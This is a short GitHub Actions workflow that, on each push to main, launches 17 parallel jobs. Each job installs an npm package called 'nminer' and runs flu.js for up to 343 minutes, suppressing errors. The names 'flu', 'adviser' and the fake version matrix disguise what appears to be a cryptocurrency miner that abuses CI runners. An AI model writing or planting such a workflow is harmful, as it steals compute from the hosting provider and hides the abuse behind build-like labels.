name: flu
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5079 }
          - { version: 8000 }
          - { version: 655 }
          - { version: 6782 }
          - { version: 3863 }
          - { version: 8552 }
          - { version: 4335 }
          - { version: 6111 }
          - { version: 8900 }
          - { version: 954 }
          - { version: 3110 }
          - { version: 1768 }
          - { version: 8751 }
          - { version: 6313 }
          - { version: 1610 }
          - { version: 3132 }
          - { version: 2402 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: adviser
        run: |
          npm install nminer@latest
          timeout 343m node flu.js || echo "flu executed"